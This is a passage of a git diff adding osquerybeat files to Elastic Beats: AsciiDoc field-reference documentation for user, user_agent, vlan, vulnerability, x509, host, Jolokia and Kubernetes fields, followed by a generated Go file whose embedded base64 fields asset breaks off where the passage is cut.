group. + +type: keyword + +-- + +*`user.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.name.text`*:: ++ +-- +type: text + +-- + +*`user.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +*`user.target.domain`*:: ++ +-- +Name of the directory the user is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.email`*:: ++ +-- +User email address. + +type: keyword + +-- + +*`user.target.full_name`*:: ++ +-- +User's full name, if available. + +type: keyword + +example: Albert Einstein + +-- + +*`user.target.full_name.text`*:: ++ +-- +type: text + +-- + +*`user.target.group.domain`*:: ++ +-- +Name of the directory the group is a member of. +For example, an LDAP or Active Directory domain name. + +type: keyword + +-- + +*`user.target.group.id`*:: ++ +-- +Unique identifier for the group on the system/platform. + +type: keyword + +-- + +*`user.target.group.name`*:: ++ +-- +Name of the group. + +type: keyword + +-- + +*`user.target.hash`*:: ++ +-- +Unique user hash to correlate information for a user in anonymized form. +Useful if `user.id` or `user.name` contain confidential information and cannot be used. + +type: keyword + +-- + +*`user.target.id`*:: ++ +-- +Unique identifier of the user. + +type: keyword + +-- + +*`user.target.name`*:: ++ +-- +Short name or login of the user. + +type: keyword + +example: albert + +-- + +*`user.target.name.text`*:: ++ +-- +type: text + +-- + +*`user.target.roles`*:: ++ +-- +Array of user roles at the time of the event. + +type: keyword + +example: ["kibana_admin", "reporting_user"] + +-- + +[float] +=== user_agent + +The user_agent fields normally come from a browser request. +They often show up in web service logs coming from the parsed user agent string. + + +*`user_agent.device.name`*:: ++ +-- +Name of the device. + +type: keyword + +example: iPhone + +-- + +*`user_agent.name`*:: ++ +-- +Name of the user agent. + +type: keyword + +example: Safari + +-- + +*`user_agent.original`*:: ++ +-- +Unparsed user_agent string. + +type: keyword + +example: Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1 + +-- + +*`user_agent.original.text`*:: ++ +-- +type: text + +-- + +*`user_agent.os.family`*:: ++ +-- +OS family (such as redhat, debian, freebsd, windows). + +type: keyword + +example: debian + +-- + +*`user_agent.os.full`*:: ++ +-- +Operating system name, including the version or code name. + +type: keyword + +example: Mac OS Mojave + +-- + +*`user_agent.os.full.text`*:: ++ +-- +type: text + +-- + +*`user_agent.os.kernel`*:: ++ +-- +Operating system kernel version as a raw string. + +type: keyword + +example: 4.4.0-112-generic + +-- + +*`user_agent.os.name`*:: ++ +-- +Operating system name, without the version. + +type: keyword + +example: Mac OS X + +-- + +*`user_agent.os.name.text`*:: ++ +-- +type: text + +-- + +*`user_agent.os.platform`*:: ++ +-- +Operating system platform (such centos, ubuntu, windows). + +type: keyword + +example: darwin + +-- + +*`user_agent.os.type`*:: ++ +-- +Use the `os.type` field to categorize the operating system into one of the broad commercial families. +One of these following values should be used (lowercase): linux, macos, unix, windows. +If the OS you're dealing with is not in the list, the field should not be populated. Please let us know by opening an issue with ECS, to propose its addition. + +type: keyword + +example: macos + +-- + +*`user_agent.os.version`*:: ++ +-- +Operating system version as a raw string. + +type: keyword + +example: 10.14.1 + +-- + +*`user_agent.version`*:: ++ +-- +Version of the user agent. + +type: keyword + +example: 12.0 + +-- + +[float] +=== vlan + +The VLAN fields are used to identify 802.1q tag(s) of a packet, as well as ingress and egress VLAN associations of an observer in relation to a specific packet or connection. +Network.vlan fields are used to record a single VLAN tag, or the outer tag in the case of q-in-q encapsulations, for a packet or connection as observed, typically provided by a network sensor (e.g. Zeek, Wireshark) passively reporting on traffic. +Network.inner VLAN fields are used to report inner q-in-q 802.1q tags (multiple 802.1q encapsulations) as observed, typically provided by a network sensor (e.g. Zeek, Wireshark) passively reporting on traffic. Network.inner VLAN fields should only be used in addition to network.vlan fields to indicate q-in-q tagging. +Observer.ingress and observer.egress VLAN values are used to record observer specific information when observer events contain discrete ingress and egress VLAN information, typically provided by firewalls, routers, or load balancers. + + +*`vlan.id`*:: ++ +-- +VLAN ID as reported by the observer. + +type: keyword + +example: 10 + +-- + +*`vlan.name`*:: ++ +-- +Optional VLAN name as reported by the observer. + +type: keyword + +example: outside + +-- + +[float] +=== vulnerability + +The vulnerability fields describe information about a vulnerability that is relevant to an event. + + +*`vulnerability.category`*:: ++ +-- +The type of system or architecture that the vulnerability affects. These may be platform-specific (for example, Debian or SUSE) or general (for example, Database or Firewall). For example (https://qualysguard.qualys.com/qwebhelp/fo_portal/knowledgebase/vulnerability_categories.htm[Qualys vulnerability categories]) +This field must be an array. + +type: keyword + +example: ["Firewall"] + +-- + +*`vulnerability.classification`*:: ++ +-- +The classification of the vulnerability scoring system. For example (https://www.first.org/cvss/) + +type: keyword + +example: CVSS + +-- + +*`vulnerability.description`*:: ++ +-- +The description of the vulnerability that provides additional context of the vulnerability. For example (https://cve.mitre.org/about/faqs.html#cve_entry_descriptions_created[Common Vulnerabilities and Exposure CVE description]) + +type: keyword + +example: In macOS before 2.12.6, there is a vulnerability in the RPC... + +-- + +*`vulnerability.description.text`*:: ++ +-- +type: text + +-- + +*`vulnerability.enumeration`*:: ++ +-- +The type of identifier used for this vulnerability. For example (https://cve.mitre.org/about/) + +type: keyword + +example: CVE + +-- + +*`vulnerability.id`*:: ++ +-- +The identification (ID) is the number portion of a vulnerability entry. It includes a unique identification number for the vulnerability. For example (https://cve.mitre.org/about/faqs.html#what_is_cve_id)[Common Vulnerabilities and Exposure CVE ID] + +type: keyword + +example: CVE-2019-00001 + +-- + +*`vulnerability.reference`*:: ++ +-- +A resource that provides additional information, context, and mitigations for the identified vulnerability. + +type: keyword + +example: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6111 + +-- + +*`vulnerability.report_id`*:: ++ +-- +The report or scan identification number. + +type: keyword + +example: 20191018.0001 + +-- + +*`vulnerability.scanner.vendor`*:: ++ +-- +The name of the vulnerability scanner vendor. + +type: keyword + +example: Tenable + +-- + +*`vulnerability.score.base`*:: ++ +-- +Scores can range from 0.0 to 10.0, with 10.0 being the most severe. +Base scores cover an assessment for exploitability metrics (attack vector, complexity, privileges, and user interaction), impact metrics (confidentiality, integrity, and availability), and scope. For example (https://www.first.org/cvss/specification-document) + +type: float + +example: 5.5 + +-- + +*`vulnerability.score.environmental`*:: ++ +-- +Scores can range from 0.0 to 10.0, with 10.0 being the most severe. +Environmental scores cover an assessment for any modified Base metrics, confidentiality, integrity, and availability requirements. For example (https://www.first.org/cvss/specification-document) + +type: float + +example: 5.5 + +-- + +*`vulnerability.score.temporal`*:: ++ +-- +Scores can range from 0.0 to 10.0, with 10.0 being the most severe. +Temporal scores cover an assessment for code maturity, remediation level, and confidence. For example (https://www.first.org/cvss/specification-document) + +type: float + +-- + +*`vulnerability.score.version`*:: ++ +-- +The National Vulnerability Database (NVD) provides qualitative severity rankings of "Low", "Medium", and "High" for CVSS v2.0 base score ranges in addition to the severity ratings for CVSS v3.0 as they are defined in the CVSS v3.0 specification. +CVSS is owned and managed by FIRST.Org, Inc. (FIRST), a US-based non-profit organization, whose mission is to help computer security incident response teams across the world. For example (https://nvd.nist.gov/vuln-metrics/cvss) + +type: keyword + +example: 2.0 + +-- + +*`vulnerability.severity`*:: ++ +-- +The severity of the vulnerability can help with metrics and internal prioritization regarding remediation. For example (https://nvd.nist.gov/vuln-metrics/cvss) + +type: keyword + +example: Critical + +-- + +[float] +=== x509 + +This implements the common core fields for x509 certificates. This information is likely logged with TLS sessions, digital signatures found in executable binaries, S/MIME information in email bodies, or analysis of files on disk. +When the certificate relates to a file, use the fields at `file.x509`. When hashes of the DER-encoded certificate are available, the `hash` data set should be populated as well (e.g. `file.hash.sha256`). +Events that contain certificate information about network connections, should use the x509 fields under the relevant TLS fields: `tls.server.x509` and/or `tls.client.x509`. + + +*`x509.alternative_names`*:: ++ +-- +List of subject alternative names (SAN). Name types vary by certificate authority and certificate type but commonly contain IP addresses, DNS names (and wildcards), and email addresses. + +type: keyword + +example: *.elastic.co + +-- + +*`x509.issuer.common_name`*:: ++ +-- +List of common name (CN) of issuing certificate authority. + +type: keyword + +example: Example SHA2 High Assurance Server CA + +-- + +*`x509.issuer.country`*:: ++ +-- +List of country (C) codes + +type: keyword + +example: US + +-- + +*`x509.issuer.distinguished_name`*:: ++ +-- +Distinguished name (DN) of issuing certificate authority. + +type: keyword + +example: C=US, O=Example Inc, OU=www.example.com, CN=Example SHA2 High Assurance Server CA + +-- + +*`x509.issuer.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: Mountain View + +-- + +*`x509.issuer.organization`*:: ++ +-- +List of organizations (O) of issuing certificate authority. + +type: keyword + +example: Example Inc + +-- + +*`x509.issuer.organizational_unit`*:: ++ +-- +List of organizational units (OU) of issuing certificate authority. + +type: keyword + +example: www.example.com + +-- + +*`x509.issuer.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`x509.not_after`*:: ++ +-- +Time at which the certificate is no longer considered valid. + +type: date + +example: 2020-07-16 03:15:39+00:00 + +-- + +*`x509.not_before`*:: ++ +-- +Time at which the certificate is first considered valid. + +type: date + +example: 2019-08-16 01:40:25+00:00 + +-- + +*`x509.public_key_algorithm`*:: ++ +-- +Algorithm used to generate the public key. + +type: keyword + +example: RSA + +-- + +*`x509.public_key_curve`*:: ++ +-- +The curve used by the elliptic curve public key algorithm. This is algorithm specific. + +type: keyword + +example: nistp521 + +-- + +*`x509.public_key_exponent`*:: ++ +-- +Exponent used to derive the public key. This is algorithm specific. + +type: long + +example: 65537 + +Field is not indexed. + +-- + +*`x509.public_key_size`*:: ++ +-- +The size of the public key space in bits. + +type: long + +example: 2048 + +-- + +*`x509.serial_number`*:: ++ +-- +Unique serial number issued by the certificate authority. For consistency, if this value is alphanumeric, it should be formatted without colons and uppercase characters. + +type: keyword + +example: 55FBB9C7DEBF09809D12CCAA + +-- + +*`x509.signature_algorithm`*:: ++ +-- +Identifier for certificate signature algorithm. We recommend using names found in Go Lang Crypto library. See https://github.com/golang/go/blob/go1.14/src/crypto/x509/x509.go#L337-L353. + +type: keyword + +example: SHA256-RSA + +-- + +*`x509.subject.common_name`*:: ++ +-- +List of common names (CN) of subject. + +type: keyword + +example: shared.global.example.net + +-- + +*`x509.subject.country`*:: ++ +-- +List of country (C) code + +type: keyword + +example: US + +-- + +*`x509.subject.distinguished_name`*:: ++ +-- +Distinguished name (DN) of the certificate subject entity. + +type: keyword + +example: C=US, ST=California, L=San Francisco, O=Example, Inc., CN=shared.global.example.net + +-- + +*`x509.subject.locality`*:: ++ +-- +List of locality names (L) + +type: keyword + +example: San Francisco + +-- + +*`x509.subject.organization`*:: ++ +-- +List of organizations (O) of subject. + +type: keyword + +example: Example, Inc. + +-- + +*`x509.subject.organizational_unit`*:: ++ +-- +List of organizational units (OU) of subject. + +type: keyword + +-- + +*`x509.subject.state_or_province`*:: ++ +-- +List of state or province names (ST, S, or P) + +type: keyword + +example: California + +-- + +*`x509.version_number`*:: ++ +-- +Version of x509 format. + +type: keyword + +example: 3 + +-- + +[[exported-fields-host-processor]] +== Host fields + +Info collected for the host machine. + + + + +*`host.containerized`*:: ++ +-- +If the host is a container. + + +type: boolean + +-- + +*`host.os.build`*:: ++ +-- +OS build information. + + +type: keyword + +example: 18D109 + +-- + +*`host.os.codename`*:: ++ +-- +OS codename, if any. + + +type: keyword + +example: stretch + +-- + +[[exported-fields-jolokia-autodiscover]] +== Jolokia Discovery autodiscover provider fields + +Metadata from Jolokia Discovery added by the jolokia provider. + + + +*`jolokia.agent.version`*:: ++ +-- +Version number of jolokia agent. + + +type: keyword + +-- + +*`jolokia.agent.id`*:: ++ +-- +Each agent has a unique id which can be either provided during startup of the agent in form of a configuration parameter or being autodetected. If autodected, the id has several parts: The IP, the process id, hashcode of the agent and its type. + + +type: keyword + +-- + +*`jolokia.server.product`*:: ++ +-- +The container product if detected. + + +type: keyword + +-- + +*`jolokia.server.version`*:: ++ +-- +The container's version (if detected). + + +type: keyword + +-- + +*`jolokia.server.vendor`*:: ++ +-- +The vendor of the container the agent is running in. + + +type: keyword + +-- + +*`jolokia.url`*:: ++ +-- +The URL how this agent can be contacted. + + +type: keyword + +-- + +*`jolokia.secured`*:: ++ +-- +Whether the agent was configured for authentication or not. + + +type: boolean + +-- + +[[exported-fields-kubernetes-processor]] +== Kubernetes fields + +Kubernetes metadata added by the kubernetes processor + + + + +*`kubernetes.pod.name`*:: ++ +-- +Kubernetes pod name + + +type: keyword + +-- + +*`kubernetes.pod.uid`*:: ++ +-- +Kubernetes Pod UID + + +type: keyword + +-- + +*`kubernetes.namespace`*:: ++ +-- +Kubernetes namespace + + +type: keyword + +-- + +*`kubernetes.node.name`*:: ++ +-- +Kubernetes node name + + +type: keyword + +-- + +*`kubernetes.node.hostname`*:: ++ +-- +Kubernetes hostname as reported by the node’s kernel + + +type: keyword + +-- + +*`kubernetes.labels.*`*:: ++ +-- +Kubernetes labels map + + +type: object + +-- + +*`kubernetes.annotations.*`*:: ++ +-- +Kubernetes annotations map + + +type: object + +-- + +*`kubernetes.service.selectors.*`*:: ++ +-- +Kubernetes Service selectors map + + +type: object + +-- + +*`kubernetes.replicaset.name`*:: ++ +-- +Kubernetes replicaset name + + +type: keyword + +-- + +*`kubernetes.deployment.name`*:: ++ +-- +Kubernetes deployment name + + +type: keyword + +-- + +*`kubernetes.statefulset.name`*:: ++ +-- +Kubernetes statefulset name + + +type: keyword + +-- + +*`kubernetes.container.name`*:: ++ +-- +Kubernetes container name (different than the name from the runtime) + + +type: keyword + +-- + +*`kubernetes.container.image`*:: ++ +-- +Kubernetes container image + + +type: alias + +alias to: container.image.name + +-- + +[[exported-fields-osquerybeat]] +== Osquerybeat fields + +None + +[[exported-fields-process]] +== Process fields + +Process metadata fields + + + + +*`process.exe`*:: ++ +-- +type: alias + +alias to: process.executable + +-- + diff --git a/x-pack/osquerybeat/docs/index.asciidoc b/x-pack/osquerybeat/docs/index.asciidoc new file mode 100644 index 00000000000..3475e7d069c --- /dev/null +++ b/x-pack/osquerybeat/docs/index.asciidoc @@ -0,0 +1,5 @@ += {Beat} Docs + +Welcome to the {Beat} documentation. + + diff --git a/x-pack/osquerybeat/include/fields.go b/x-pack/osquerybeat/include/fields.go new file mode 100644 index 00000000000..7270d04fb3d --- /dev/null +++ b/x-pack/osquerybeat/include/fields.go @@ -0,0 +1,23 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// Code generated by beats/dev-tools/cmd/asset/asset.go - DO NOT EDIT. + +package include + +import ( + "github.com/elastic/beats/v7/libbeat/asset" +) + +func init() { + if err := asset.SetFields("osquerybeat", "fields.yml", asset.BeatFieldsPri, AssetFieldsYml); err != nil { + panic(err) + } +} + +// AssetFieldsYml returns asset data. +// This is the base64 encoded gzipped contents of fields.yml. +func AssetFieldsYml() string { + return "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